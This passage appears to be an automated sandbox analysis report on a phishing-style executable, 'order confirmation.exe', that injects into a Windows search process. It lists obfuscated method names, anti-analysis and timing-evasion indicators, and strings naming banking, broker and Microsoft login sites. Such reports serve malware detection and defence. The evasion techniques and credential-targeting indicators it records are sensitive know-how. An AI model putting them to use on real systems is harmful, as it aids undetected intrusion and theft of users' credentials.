                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_009EE8E6 push esp; retf 9_2_009EE87B
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_009EED73 push edx; iretd 9_2_009EED76
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_009F564E push eax; retf 9_2_009F564F
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_009E7878 push es; retf 9_2_009E7885
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_009FB9E3 push es; retf 9_2_009FB9E4
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_009E1C54 push es; retf 9_2_009E1C72
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_009FBD02 push cs; iretd 9_2_009FBD05
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_009FBD45 push FFFFFFB7h; retf 9_2_009FBD52
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_033C634D push ebx; ret 9_2_033C634E
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_033D51E2 push eax; ret 9_2_033D51E4
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_033CA42B push BF809140h; iretd 9_2_033CA430
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_033C49A1 push ecx; ret 9_2_033C49B2
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_033C5F21 push 0D885E92h; iretd 9_2_033C5F33
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_033C5E9A push ebx; retf 9_2_033C5EAB
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_033C4C5B push esp; iretd 9_2_033C4C61
                Source: order confirmation.exeStatic PE information: section name: .text entropy: 7.725344675276943
                Source: 0.2.order confirmation.exe.7e60000.4.raw.unpack, I01eWUa5a4YqRk1Pks.csHigh entropy of concatenated method names: 'ToString', 'g9iGmuvC0W', 'McKGfXQiO7', 'uSbGQW8Mrv', 'PpxGO9Hdjs', 'y2xGc39Esi', 'BMQGUd5Tjt', 'aLNG0l7K75', 'C4EG7dyC28', 'Vt4GrPGudV'
                Source: 0.2.order confirmation.exe.7e60000.4.raw.unpack, NAyr630kycSMkRTekS.csHigh entropy of concatenated method names: 'rk4SAuS8bA', 'RwkSlI0SEN', 'd3FSFLc6yR', 'sHqFyV69oF', 'AmgFz8U9BL', 'wFhSgICalQ', 'rs9Sd25q7F', 'eWiSxlVnag', 'W5rSZEqTTB', 'R8rS5QDNVw'
                Source: 0.2.order confirmation.exe.7e60000.4.raw.unpack, RXPtXddd34BOyV3B993.csHigh entropy of concatenated method names: 'vCbByPrf5f', 'uryBz5sus9', 'NMWMgJr2H4', 'mLjMdp2Kin', 'fNbMxDp3VV', 'FOAMZtlWHP', 'd4aM5aVFOx', 'pHXMEgvmWj', 'mOGMADd7qx', 'IueMhHrIem'
                Source: 0.2.order confirmation.exe.7e60000.4.raw.unpack, CvrOpr8N5c52lFvUfQ.csHigh entropy of concatenated method names: 'xYUutOHaLG', 'w0Nu3461Fo', 'mxtuHh33JB', 'ANVufmM4IL', 'jwVuOqrk96', 'aLbuc6RELo', 'Dfnu0MOKHh', 'TNCu7Cgpt9', 'O94uogn0m0', 'swbum50a4v'
                Source: 0.2.order confirmation.exe.7e60000.4.raw.unpack, hkt52UhSuFeE4wui5e.csHigh entropy of concatenated method names: 'Dispose', 'bjrdL13q7X', 'samxf2JKnv', 'vA7L9I3vWl', 'IsNdy6SYj6', 'DKJdzfsNkr', 'ProcessDialogKey', 'uWhxg3uUco', 'ajZxdMwaLF', 'GqYxx4uVIZ'
                Source: 0.2.order confirmation.exe.7e60000.4.raw.unpack, dgCFPLW4uneWdG73uv.csHigh entropy of concatenated method names: 'lvikePTupV', 'SAIkyEQkiy', 'bnxpgTNKAA', 'JaWpdipYdL', 'EmekmuspQf', 'khukNZTF5Y', 'fxck8biheq', 'JS4k6eyOSA', 'n5GkPR11w1', 'GPVkaqbOCf'
                Source: 0.2.order confirmation.exe.7e60000.4.raw.unpack, pdPLqmV7ftO3csrOSh.csHigh entropy of concatenated method names: 'NJxZEmIW1S', 'lcWZAOoeGm', 'hS9ZhgyvZp', 'QGRZlu00jV', 'cotZsUsiPX', 'yaYZFcbKtQ', 'DCrZSi8cgS', 'fh4ZVisLJU', 'MqXZYUQEXS', 'RElZJMHJYl'
                Source: 0.2.order confirmation.exe.7e60000.4.raw.unpack, mf0g6BxlncBLcMs9vl.csHigh entropy of concatenated method names: 'i9R1WPeXu', 'aIKInqgKR', 'g5ev5PVHO', 'fD52U1yQB', 'afZ3Vk4UR', 'N5jKZf5YN', 'lQXG8dHHfwDM4xo94i', 'JBAoyvI4NhpJu6pvFC', 'NvBppvlIo', 'wlVB1HlJ4'
                Source: 0.2.order confirmation.exe.7e60000.4.raw.unpack, JN4XXZ6PICssBZMSHD.csHigh entropy of concatenated method names: 'QWWboRf1Lr', 'N8LbNYwqcQ', 'J08b6lWYNR', 'QIEbPNFoyV', 'hfebfvHkNL', 'T0CbQISLNJ', 'ia9bORrjyx', 'DrHbcpip0h', 'mM8bUjZnuN', 'QKIb0gCqGM'
                Source: 0.2.order confirmation.exe.7e60000.4.raw.unpack, XsdBy7dgRUJpttABLTs.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OLaBmkacIB', 'EApBNInhUT', 'XDYB8L7WQ3', 'mmZB6ycong', 'V8qBP54BUS', 'tfpBaqxY7W', 'GYLBi37xqX'
                Source: 0.2.order confirmation.exe.7e60000.4.raw.unpack, hx0QSOdEufAPpXeq4ZC.csHigh entropy of concatenated method names: 'Ysk8M2JJMOpJI', 'kdjq6ByzHIyryXgysqW', 'LhtpE90oqxJHKhakMLp', 'Eo5fB4yRAiDG3XjXUDE', 'h8S1oyyWeglyR9Gmpnj', 'PvfRPs0lcKRC4wWjVUi'
                Source: 0.2.order confirmation.exe.7e60000.4.raw.unpack, f3uUcoLgjZMwaLFHqY.csHigh entropy of concatenated method names: 'QvWqHfbejs', 'qdsqfR9uiy', 'YAmqQPeIim', 'JRDqOkbLNX', 'oEjqcJRXgv', 'OiGqUVKrXm', 'Vfrq0Eij0b', 'NEZq7dbEFd', 'aXqqrTHxhf', 'Sy3qoQ2q1B'
                Source: 0.2.order confirmation.exe.7e60000.4.raw.unpack, sK5CiUr0RFvsNJjLtI.csHigh entropy of concatenated method names: 'M6KSR3l3LT', 'hVWSj1iMYa', 'MbhS1jpSfQ', 'jrvSIQ6uyd', 'LXcS4QcLCe', 'jjWSvjclJ0', 'j6ZS2jlMAQ', 'v1gStJlMvE', 'tQyS3Yhf7d', 'XkrSKXoNk2'
                Source: 0.2.order confirmation.exe.7e60000.4.raw.unpack, xpA5N3CN7djr13q7XO.csHigh entropy of concatenated method names: 'tYfqbxCFbv', 'ro8qkhofH3', 'o22qqqaNQG', 'XnWqMBj9fL', 'gGxq9RTuCJ', 'WDaqwutZgh', 'Dispose', 'v07pA3dcFq', 'kiOphkoVPC', 'PBHpl7xik1'
                Source: 0.2.order confirmation.exe.7e60000.4.raw.unpack, wbVUabtqW87IewAOlm.csHigh entropy of concatenated method names: 'aFwh6J8qvS', 'G3ThPsdAMi', 'KSQhaS1t45', 'uqFhigD9ZI', 'zDnhT56Jac', 'CYVhWBTTNc', 'QPehCq3P1n', 'yNRheWgm3f', 'YJyhLclXcd', 'RSGhyZavts'
                Source: 0.2.order confirmation.exe.7e60000.4.raw.unpack, bLxcEAlQYZvBFJ1is0.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'UnkxL43H9s', 'ECyxyDeJto', 'tMOxzataql', 'O9UZg1A27v', 'yunZdxPT2Y', 'jTcZxBnABf', 'yq5ZZh8JKW', 'JGZ8X4zDjmrwGoeCrd'
                Source: 0.2.order confirmation.exe.7e60000.4.raw.unpack, IyCppl5YfSm0javFKf.csHigh entropy of concatenated method names: 'BFwdSbVUab', 'sW8dV7IewA', 'CLhdJwSmpI', 'WE2dXJSOnf', 's0ndbkyEFp', 'rSodGjc0bL', 'XP4Vdf41VE84XWOMpM', 'YeyB6kYiZmja6qRAUU', 'jkgddoT94q', 'EVAdZwXqjV'
                Source: 0.2.order confirmation.exe.7e60000.4.raw.unpack, jOnfWvKNqM2dRq0nky.csHigh entropy of concatenated method names: 'P1Xs4T02P7', 'd9Ls2nSCTJ', 'c1rlQKQfvj', 'FW1lO1X8Dx', 'oCClcyvs9q', 'idLlUv0pOR', 'yaYl0spF34', 'B93l7ZPTrj', 'kVolrYxl8E', 'Hc4loRBDNk'
                Source: 0.2.order confirmation.exe.7e60000.4.raw.unpack, NEcM9TzovpIamIGC9E.csHigh entropy of concatenated method names: 'VsyBv9qP25', 'zpCBtcbU9h', 'q2lB33umIE', 'HymBHoUvc8', 'nZqBfAWr2J', 'fo4BOUWO3r', 'iuUBcMgpGW', 'mfIBwQ0Y12', 'badBREfvIc', 'pqDBjZUCpW'
                Source: 0.2.order confirmation.exe.7e60000.4.raw.unpack, Q1ABfhd5wSq6NV6Ct3f.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Yl2nqCfjXM', 'tcLnBwWJt6', 'N4TnMH01s3', 'jgInnftlNV', 'VXfn9kw5HF', 'F1rnD5RWXj', 'bYAnw4Kc6k'
                Source: 0.2.order confirmation.exe.7e60000.4.raw.unpack, VrXh8v3LhwSmpIeE2J.csHigh entropy of concatenated method names: 'pfplIdW9wG', 'oSglv63Y8D', 'dEtltvlH9d', 'Xuil390185', 'EmelbvLBVd', 'WGKlGTe6yi', 'ia8lkGU7Ym', 'D0LlpZ1hUS', 'qW1lqwee5C', 'QvslBPjd7d'
                Source: 0.2.order confirmation.exe.7e60000.4.raw.unpack, rEVkuUdxH6yKZ10OgQA.csHigh entropy of concatenated method names: 'ToString', 'dVKMtQaxes', 'v4LM3cROpJ', 'qg3MKFfDx1', 'P7aMHy8Kjg', 'Iw1MfwHls2', 'fWZMQgAQFI', 'V7tMObyO18', 'YPRV9EyhXeLWHbSErRH', 'wywkHJyeXmq3rpPyVdO'
                Source: 0.2.order confirmation.exe.7e60000.4.raw.unpack, eFppSoHjc0bL0r73SE.csHigh entropy of concatenated method names: 'aH2FEA00Ui', 'jjSFhBiPX3', 'SJ7FsvEpQO', 'EyhFSXNM6U', 'fPuFVjwNBJ', 'PxbsTewP6U', 'GpAsWWDvto', 'YbWsCmrksm', 'aH2seqMmWE', 'b75sLiW2jl'
                Source: 0.2.order confirmation.exe.4626688.1.raw.unpack, I01eWUa5a4YqRk1Pks.csHigh entropy of concatenated method names: 'ToString', 'g9iGmuvC0W', 'McKGfXQiO7', 'uSbGQW8Mrv', 'PpxGO9Hdjs', 'y2xGc39Esi', 'BMQGUd5Tjt', 'aLNG0l7K75', 'C4EG7dyC28', 'Vt4GrPGudV'
                Source: 0.2.order confirmation.exe.4626688.1.raw.unpack, NAyr630kycSMkRTekS.csHigh entropy of concatenated method names: 'rk4SAuS8bA', 'RwkSlI0SEN', 'd3FSFLc6yR', 'sHqFyV69oF', 'AmgFz8U9BL', 'wFhSgICalQ', 'rs9Sd25q7F', 'eWiSxlVnag', 'W5rSZEqTTB', 'R8rS5QDNVw'
                Source: 0.2.order confirmation.exe.4626688.1.raw.unpack, RXPtXddd34BOyV3B993.csHigh entropy of concatenated method names: 'vCbByPrf5f', 'uryBz5sus9', 'NMWMgJr2H4', 'mLjMdp2Kin', 'fNbMxDp3VV', 'FOAMZtlWHP', 'd4aM5aVFOx', 'pHXMEgvmWj', 'mOGMADd7qx', 'IueMhHrIem'
                Source: 0.2.order confirmation.exe.4626688.1.raw.unpack, CvrOpr8N5c52lFvUfQ.csHigh entropy of concatenated method names: 'xYUutOHaLG', 'w0Nu3461Fo', 'mxtuHh33JB', 'ANVufmM4IL', 'jwVuOqrk96', 'aLbuc6RELo', 'Dfnu0MOKHh', 'TNCu7Cgpt9', 'O94uogn0m0', 'swbum50a4v'
                Source: 0.2.order confirmation.exe.4626688.1.raw.unpack, hkt52UhSuFeE4wui5e.csHigh entropy of concatenated method names: 'Dispose', 'bjrdL13q7X', 'samxf2JKnv', 'vA7L9I3vWl', 'IsNdy6SYj6', 'DKJdzfsNkr', 'ProcessDialogKey', 'uWhxg3uUco', 'ajZxdMwaLF', 'GqYxx4uVIZ'
                Source: 0.2.order confirmation.exe.4626688.1.raw.unpack, dgCFPLW4uneWdG73uv.csHigh entropy of concatenated method names: 'lvikePTupV', 'SAIkyEQkiy', 'bnxpgTNKAA', 'JaWpdipYdL', 'EmekmuspQf', 'khukNZTF5Y', 'fxck8biheq', 'JS4k6eyOSA', 'n5GkPR11w1', 'GPVkaqbOCf'
                Source: 0.2.order confirmation.exe.4626688.1.raw.unpack, pdPLqmV7ftO3csrOSh.csHigh entropy of concatenated method names: 'NJxZEmIW1S', 'lcWZAOoeGm', 'hS9ZhgyvZp', 'QGRZlu00jV', 'cotZsUsiPX', 'yaYZFcbKtQ', 'DCrZSi8cgS', 'fh4ZVisLJU', 'MqXZYUQEXS', 'RElZJMHJYl'
                Source: 0.2.order confirmation.exe.4626688.1.raw.unpack, mf0g6BxlncBLcMs9vl.csHigh entropy of concatenated method names: 'i9R1WPeXu', 'aIKInqgKR', 'g5ev5PVHO', 'fD52U1yQB', 'afZ3Vk4UR', 'N5jKZf5YN', 'lQXG8dHHfwDM4xo94i', 'JBAoyvI4NhpJu6pvFC', 'NvBppvlIo', 'wlVB1HlJ4'
                Source: 0.2.order confirmation.exe.4626688.1.raw.unpack, JN4XXZ6PICssBZMSHD.csHigh entropy of concatenated method names: 'QWWboRf1Lr', 'N8LbNYwqcQ', 'J08b6lWYNR', 'QIEbPNFoyV', 'hfebfvHkNL', 'T0CbQISLNJ', 'ia9bORrjyx', 'DrHbcpip0h', 'mM8bUjZnuN', 'QKIb0gCqGM'
                Source: 0.2.order confirmation.exe.4626688.1.raw.unpack, XsdBy7dgRUJpttABLTs.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'OLaBmkacIB', 'EApBNInhUT', 'XDYB8L7WQ3', 'mmZB6ycong', 'V8qBP54BUS', 'tfpBaqxY7W', 'GYLBi37xqX'
                Source: 0.2.order confirmation.exe.4626688.1.raw.unpack, hx0QSOdEufAPpXeq4ZC.csHigh entropy of concatenated method names: 'Ysk8M2JJMOpJI', 'kdjq6ByzHIyryXgysqW', 'LhtpE90oqxJHKhakMLp', 'Eo5fB4yRAiDG3XjXUDE', 'h8S1oyyWeglyR9Gmpnj', 'PvfRPs0lcKRC4wWjVUi'
                Source: 0.2.order confirmation.exe.4626688.1.raw.unpack, f3uUcoLgjZMwaLFHqY.csHigh entropy of concatenated method names: 'QvWqHfbejs', 'qdsqfR9uiy', 'YAmqQPeIim', 'JRDqOkbLNX', 'oEjqcJRXgv', 'OiGqUVKrXm', 'Vfrq0Eij0b', 'NEZq7dbEFd', 'aXqqrTHxhf', 'Sy3qoQ2q1B'
                Source: 0.2.order confirmation.exe.4626688.1.raw.unpack, sK5CiUr0RFvsNJjLtI.csHigh entropy of concatenated method names: 'M6KSR3l3LT', 'hVWSj1iMYa', 'MbhS1jpSfQ', 'jrvSIQ6uyd', 'LXcS4QcLCe', 'jjWSvjclJ0', 'j6ZS2jlMAQ', 'v1gStJlMvE', 'tQyS3Yhf7d', 'XkrSKXoNk2'
                Source: 0.2.order confirmation.exe.4626688.1.raw.unpack, xpA5N3CN7djr13q7XO.csHigh entropy of concatenated method names: 'tYfqbxCFbv', 'ro8qkhofH3', 'o22qqqaNQG', 'XnWqMBj9fL', 'gGxq9RTuCJ', 'WDaqwutZgh', 'Dispose', 'v07pA3dcFq', 'kiOphkoVPC', 'PBHpl7xik1'
                Source: 0.2.order confirmation.exe.4626688.1.raw.unpack, wbVUabtqW87IewAOlm.csHigh entropy of concatenated method names: 'aFwh6J8qvS', 'G3ThPsdAMi', 'KSQhaS1t45', 'uqFhigD9ZI', 'zDnhT56Jac', 'CYVhWBTTNc', 'QPehCq3P1n', 'yNRheWgm3f', 'YJyhLclXcd', 'RSGhyZavts'
                Source: 0.2.order confirmation.exe.4626688.1.raw.unpack, bLxcEAlQYZvBFJ1is0.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'UnkxL43H9s', 'ECyxyDeJto', 'tMOxzataql', 'O9UZg1A27v', 'yunZdxPT2Y', 'jTcZxBnABf', 'yq5ZZh8JKW', 'JGZ8X4zDjmrwGoeCrd'
                Source: 0.2.order confirmation.exe.4626688.1.raw.unpack, IyCppl5YfSm0javFKf.csHigh entropy of concatenated method names: 'BFwdSbVUab', 'sW8dV7IewA', 'CLhdJwSmpI', 'WE2dXJSOnf', 's0ndbkyEFp', 'rSodGjc0bL', 'XP4Vdf41VE84XWOMpM', 'YeyB6kYiZmja6qRAUU', 'jkgddoT94q', 'EVAdZwXqjV'
                Source: 0.2.order confirmation.exe.4626688.1.raw.unpack, jOnfWvKNqM2dRq0nky.csHigh entropy of concatenated method names: 'P1Xs4T02P7', 'd9Ls2nSCTJ', 'c1rlQKQfvj', 'FW1lO1X8Dx', 'oCClcyvs9q', 'idLlUv0pOR', 'yaYl0spF34', 'B93l7ZPTrj', 'kVolrYxl8E', 'Hc4loRBDNk'
                Source: 0.2.order confirmation.exe.4626688.1.raw.unpack, NEcM9TzovpIamIGC9E.csHigh entropy of concatenated method names: 'VsyBv9qP25', 'zpCBtcbU9h', 'q2lB33umIE', 'HymBHoUvc8', 'nZqBfAWr2J', 'fo4BOUWO3r', 'iuUBcMgpGW', 'mfIBwQ0Y12', 'badBREfvIc', 'pqDBjZUCpW'
                Source: 0.2.order confirmation.exe.4626688.1.raw.unpack, Q1ABfhd5wSq6NV6Ct3f.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Yl2nqCfjXM', 'tcLnBwWJt6', 'N4TnMH01s3', 'jgInnftlNV', 'VXfn9kw5HF', 'F1rnD5RWXj', 'bYAnw4Kc6k'
                Source: 0.2.order confirmation.exe.4626688.1.raw.unpack, VrXh8v3LhwSmpIeE2J.csHigh entropy of concatenated method names: 'pfplIdW9wG', 'oSglv63Y8D', 'dEtltvlH9d', 'Xuil390185', 'EmelbvLBVd', 'WGKlGTe6yi', 'ia8lkGU7Ym', 'D0LlpZ1hUS', 'qW1lqwee5C', 'QvslBPjd7d'
                Source: 0.2.order confirmation.exe.4626688.1.raw.unpack, rEVkuUdxH6yKZ10OgQA.csHigh entropy of concatenated method names: 'ToString', 'dVKMtQaxes', 'v4LM3cROpJ', 'qg3MKFfDx1', 'P7aMHy8Kjg', 'Iw1MfwHls2', 'fWZMQgAQFI', 'V7tMObyO18', 'YPRV9EyhXeLWHbSErRH', 'wywkHJyeXmq3rpPyVdO'
                Source: 0.2.order confirmation.exe.4626688.1.raw.unpack, eFppSoHjc0bL0r73SE.csHigh entropy of concatenated method names: 'aH2FEA00Ui', 'jjSFhBiPX3', 'SJ7FsvEpQO', 'EyhFSXNM6U', 'fPuFVjwNBJ', 'PxbsTewP6U', 'GpAsWWDvto', 'YbWsCmrksm', 'aH2seqMmWE', 'b75sLiW2jl'
                Source: C:\Users\user\Desktop\order confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD324
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD7E4
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD944
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD504
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD544
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeAPI/Special instruction interceptor: Address: 7FFBCB7AD1E4
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeAPI/Special instruction interceptor: Address: 7FFBCB7B0154
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeAPI/Special instruction interceptor: Address: 7FFBCB7ADA44
                Source: C:\Users\user\Desktop\order confirmation.exeMemory allocated: 1700000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeMemory allocated: 3550000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeMemory allocated: 1890000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeMemory allocated: 95C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeMemory allocated: 8030000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeMemory allocated: A5C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeMemory allocated: B5C0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeCode function: 4_2_013F096E rdtsc 4_2_013F096E
                Source: C:\Users\user\Desktop\order confirmation.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeWindow / User API: threadDelayed 651Jump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeWindow / User API: threadDelayed 9322Jump to behavior
                Source: C:\Users\user\Desktop\order confirmation.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeAPI coverage: 2.6 %
                Source: C:\Users\user\Desktop\order confirmation.exe TID: 3640Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe TID: 1384Thread sleep count: 651 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe TID: 1384Thread sleep time: -1302000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe TID: 1384Thread sleep count: 9322 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exe TID: 1384Thread sleep time: -18644000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\SearchProtocolHost.exeCode function: 9_2_009FC860 FindFirstFileW,FindNextFileW,FindClose,9_2_009FC860
                Source: C:\Users\user\Desktop\order confirmation.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: sE716IK71M.9.drBinary or memory string: ms.portal.azure.comVMware20,11696494690
                Source: sE716IK71M.9.drBinary or memory string: discord.comVMware20,11696494690f
                Source: sE716IK71M.9.drBinary or memory string: AMC password management pageVMware20,11696494690
                Source: sE716IK71M.9.drBinary or memory string: outlook.office.comVMware20,11696494690s
                Source: sE716IK71M.9.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                Source: sE716IK71M.9.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                Source: sE716IK71M.9.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                Source: sE716IK71M.9.drBinary or memory string: interactivebrokers.comVMware20,11696494690
                Source: sE716IK71M.9.drBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                Source: sE716IK71M.9.drBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                Source: sE716IK71M.9.drBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                Source: sE716IK71M.9.drBinary or memory string: outlook.office365.comVMware20,11696494690t
                Source: sE716IK71M.9.drBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                Source: XDBtzWJieMe.exe, 0000000A.00000002.2819212672.000000000098F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllh
                Source: sE716IK71M.9.drBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                Source: SearchProtocolHost.exe, 00000009.00000002.2818884774.0000000002F69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllD&bQ
                Source: sE716IK71M.9.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                Source: sE716IK71M.9.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                Source: sE716IK71M.9.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                Source: sE716IK71M.9.drBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                Source: sE716IK71M.9.drBinary or memory string: tasks.office.comVMware20,11696494690o
